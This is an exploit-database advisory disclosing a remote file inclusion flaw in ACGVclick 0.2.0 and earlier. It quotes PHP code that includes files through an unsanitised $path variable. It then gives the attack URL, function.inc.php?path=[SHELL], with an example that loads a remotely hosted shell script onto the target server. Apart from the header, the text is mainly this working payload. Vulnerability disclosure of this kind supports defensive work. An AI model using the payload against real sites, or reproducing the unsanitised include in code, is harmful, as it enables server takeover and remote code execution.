id: 1431
date: 01/27/2007
title: ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability
author: ajann
cves: 

===========================================================
ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability
===========================================================



*******************************************************************************
# Title   :  ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://acgv.free.fr
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include($path."mysql.php");
include($path."aclick_connect.php");
$raf= new mysql_connection($hote,$login,$pass,$base);
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]//function.inc.php?path=[SHELL]

Example:

//function.inc.php?path=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!


#  0day.today [2023-03-27]  #